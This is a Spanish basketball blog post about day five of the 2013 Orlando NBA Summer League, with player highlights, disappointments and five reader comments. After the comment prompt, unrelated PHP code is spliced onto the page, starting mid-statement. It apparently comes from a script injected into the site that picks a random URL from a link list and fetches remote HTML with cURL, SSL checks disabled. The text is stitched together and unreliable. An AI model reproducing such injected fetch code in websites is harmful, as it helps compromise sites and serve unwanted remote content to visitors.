Summer Leagues: Día 5

12 de July de 2013 por rumbero

Penúltimo día en Orlando con 4 partidos en juego y esta vez sin ningún apagón. Indiana le ganó a Utah 79-73 y Detroit hizo lo mismo con Miami 78-77 gracias a un gran último cuarto y un winner dunk de Mitchell.

oladipo

Los Rockets siguen a lo suyo y ayer ganaron su cuarto partido. Esta vez su víctima fueron los Nets (92-76). Para cerrar la jornada tuvimos un interesante Sixers-Magic que también se decidió en el último suspiro con una canasta cortesía de Oladipo (89-90).

DESTACADOS

Señor X

Mini prueba de conocimientos. 23 puntos, 18 rebotes (7 ofensivos), 2 robos, 5 pérdidas y 2 tapones. ¿Quién puede hacer estos numerazos en un partido de SL? Sí, seguramente es el que estáis pensando. Pista: juega en el equipo del estado cuya capital es Lansing.

Victor Oladipo

Somos muy fans de Oladipo sí, pero es que el chaval se está ganando a pulso que se pongan muchas esperanzas con lo que pueda hacer en Orlando. 24 puntos, 3 rebotes, 6 asistencias, 3 robos y 5 pérdidas y este pedazo de game winner a falta de 6 segundos para tumbar a los Sixers.

Harkless & Nicholson & Quinn

Estos de Orlando tienen tanto chaval bueno que los metemos en un pack y listos. 15-5-4 para el primero haciendo un partido muy completo como casi siempre; 23-3 para el segundo, muy fino de cara al aro; y 7/11 para Quinn con un par de asistencias, robos y tapones de regalo. Y nuestro Denise, la mar de contento.

Solomon Hill & Orlando Johnson

Estos dos siguen con su “lucha” particular para ver quién puede ser el que robe más minutos durante la temporada regular en la rotación de Indiana. Ayer se combinaron para hacer un 6/10 en triples. El rookie Hill sigue transmitiendo buenas sensaciones.

Rudy Gobert

gobertYa apuntábamos en la anterior jornada que habría que seguir la evolución del grandullón de los Jazz. Ayer en 24 minutos: 11 puntos, 8 rebotes, 1 asistencia, 1 robo, 3 tapones y mucha intimidación en la pintura. Increíble la envergadura del chaval, que cogió un rebote e hizo un palmeo en el techo del pabellón que es para verlo. Brazacos Gobert.

Peyton Siva

9 puntos, 9 asistencias y 7 robos. En la jornada 3 ya destacamos su buen partido y las buenas maneras como director de juego para ser un nº56 del draft (y comparado con algunos pollos sin cabeza que corren por ahí). El problema es que con la llegada de Billups se le cierran aún más las puertas de tener minutos con los Pistons.

Terrence Jones & Greg Smith

Buena pareja la que forman estos dos y parte importante para que los Rockets no hayan perdido ningún partido de SL. 16 puntos, 5 rebotes, 7 asistencias, 2 robos y 7 pérdidas para Terrence y 12 puntos, 9 rebotes, 2 robos y 2 pérdidas para el center. A ver qué planes tiene McHale con ellos.

Tyshawn Taylor

Buen jugador el base de los Nets. O al menos eso demuestra en las Summer League, aunque luego no le den bola durante la RS. 15 puntos, 7 asistencias, 4 rebotes, 3 robos y 4 pérdidas. Podría dar algo de descanso a Deron perfectamente.

Ian Clark

No fue drafteado por ningún equipo este año pero está cuajando buenos partidos. 15 puntos, 4 rebotes, 2 asistencias, 1 robo y 4 pérdidas. Después de jugar para Miami lo hará también en las Vegas con GSW en busca de algún hueco.

Arnett Moultrie

23 puntos y 12 rebotes. Otro al que se le nota que ha jugado más cosas que una SL y que quiere tener más protagonismo esta temporada.

A SEGUIR

Tony Mitchell (el de Detroit)

Vaya muelles que gasta el amigo. Entre esto y las ganas que le pone suple sus carencias técnicas. 7 puntos (2/8 FG), 9 rebotes (7 ofensivos), 2 asistencias y 2 robos. Puede ser proyecto de jugador interesante y claro candidato a participar en el concurso de mates. Dio la victoria a los suyos con el mate que hemos puesto al principio.

kcpKentavious Caldwell-Pope

Lo ponemos en este apartado porque su partido no fue espectacular pero parece que va soltándose algo más. 15 puntos, 4 rebotes, 2 asistencias, 3 robos y 1 pérdida. Va para arriba.

Tornike Shengeila

Es difícil que lo veamos jugar algo más que los minutos de la basura después del equipo que han montado en Brooklyn pero siempre que sale suele hacerlo bien. 9 puntos, 4 rebotes, 3 asistencias, 6 robos, 2 tapones y 4 pérdidas.

Plumlee Brothers

Los pusimos aquí en la primera jornada por sus buenos partidos y al día siguiente explotaron con dos actuaciones brillantes. En estos últimos, sin llegar a ser decepciones, parece que han aflojado un poco. ¿Con qué versión nos quedamos?

DECEPCIONES

Trey Burke

Se comenta en los pasillos de la Summer League que el Presidente del consejo de Administración de los Gepetto Brothers ya ha aceptado la solicitud de Burke (y también de su amigo MCW) para que entren a formar parte del selecto grupo. 8 puntos, 2 rebotes, 4 asistencias y 1 pérdida. 3/15FG y 0/5 3P. Lleva un terrorífico 21,4% en FG y 6.7% desde el triple en esta SL. Vamos, Trey, que sabemos que puedes hacerlo mejor.

Kim English

El de Detroit estuvo muy mal de cara a canasta con un 3/11 y para adornarlo sólo añadió a sus estadísticas 3 faltas y 3 pérdidas.

PREMIO MCW

Michael Carter-Williams

Nos hemos visto obligados a crear la sección especial para MCW ante la imposibilidad de definir cómo son sus partidos. 11 puntos (3/10), 6 rebotes, 9 asistencias, 8 pérdidas y 1 robo. Hace cosas muy bien y otras terriblemente mal. Que no es buen tirador ya lo sabíamos pero además alterna buenas jugadas con muy malas decisiones. Será que le pesa llevar la responsabilidad del equipo (como a Burke) pero si en la SL ya les cuesta arrancar cuando empiece la temporada pueden pasarlo aun peor. Encima la canasta ganadora de Oladipo fue en su cara.

Comenta

5 comentarios a esta entrada

  1. Esteban dice:
    #1

    vaya chasco poarecen algunos muchachos q tantas expectativas despertaron

    sacando a los lesionados bennet y noel que nisiquiera estan corriendo, Kentavious Caldwell-Pope y carter-williams no parece que esten haciendo grandes cosas… habra que esperar

    moultrie deberia ver muchisimos minutos en la reconstruccion de los 76ers

    mientras que terrence jones hoy por hoy es el 4 titular de los rockets o me equiovoco?

    ojala que alguien tome el contrato de granger y los pacers dejen como perimetrales de recambio a orlando jhonson y salomon hill, seria un paso para atras respecto de granger, pero los pacers luego de la renovacion de george no van a tener espacio para nada

      Citar

  2. Sancho88 dice:
    #2

    Mitchell ya jugó el año pasado en los Kings en Las Vegas, y me sorprendió mucho no verlo elegido por ellos en segunda ronda, con el déficit de aleros que tiene el equipo. Realmente es lo que comentas Rumbero, es un tío intenso, rápido, intenso, que le gusta mucho jugar al contraataque y luchar en defensa. No tiene gran cosa en ataque en cuanto a movimientos y tal, pero aporta tanto por su actitud que puede venirle bien a cualquier equipo. Puede ser el Dyamond Green de este año

      Citar

  3. Denise dice:
    #3

    Wow, vaya buzzer-beater de Oladipo ante un tio de mas de 2 metros y brazos largos.
    Muy buena Summer League de todos los chavales de Orlando con contrato en vigor.
    Oladipo debe mejorar su ratio asistencias/perdidas pero bueno, está jugando de base, espero que Orlando fiche a un base, porque no creo que Victor sea un buen PG cuando tenga que enfrentarse con los mayores.

    El señor X (Drummond) que se retire de la Summer League, no pinta absolutamnete nada ahí. Tremendo, yo ya desde el año pasado confío en que sea el proximo center dominante de la liga.

    Y lo de Carter-Williams no tiene nombre, entre éste pavo y Noel lesionado, a día de hoy no creo que lleguen ni a 15 victorias. Turner, Young y lo demas todo basura organica….

      Citar

  4. rumbero dice:
    #4

    Esteban:
    vaya chasco poarecen algunos muchachos q tantas expectativas despertaron

    sacando a los lesionados bennet y noel que nisiquiera estan corriendo, Kentavious Caldwell-Pope y carter-williams no parece que esten haciendo grandes cosas… habra que esperar

    moultrie deberia ver muchisimos minutos en la reconstruccion de los 76ers

    mientras que terrence jones hoy por hoy es el 4 titular de los rockets o me equiovoco?

    ojala que alguien tome el contrato de granger y los pacers dejen como perimetrales de recambio a orlando jhonson y salomon hill, seria un paso para atras respecto de granger, pero los pacers luego de la renovacion de george no van a tener espacio para nada

    Con KCP hay que tener en cuenta que es básicamente un tirador y tener un mal día significa quedarse en nada. Ha ido de menos a más claramente (hoy ha jugado su mejor partido) mientras que MCW y Burke aun no han aterrizado en la Summer League.

    Lo de Jones titular yo lo veo complicado pero vete tu a saber. Motiejunas ya salió de inicio muchos partidos la temporada pasada, incluso Greg Smith. Y viendo los partidos de PO en los que jugaba Parsons de 4 y Francisco García de 3 tampoco sorprendería y más con Howard al lado para dejarle toda la pintura para él. Pero que debería tener minutos parece claro.

      Citar

  5. Esteban dice:
    #5

    mas veo a drummon y mas me acuerdo de monroe y me quedo pasmado sin saber en que pensaron en detroit para firmarle semejante contrato a smith

    tampoco es un contrato toxico, si funciona bien, es un jugador traspasable, pero hoy deberia ser suplente de monroe y drummond a ver si siguen progresando

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>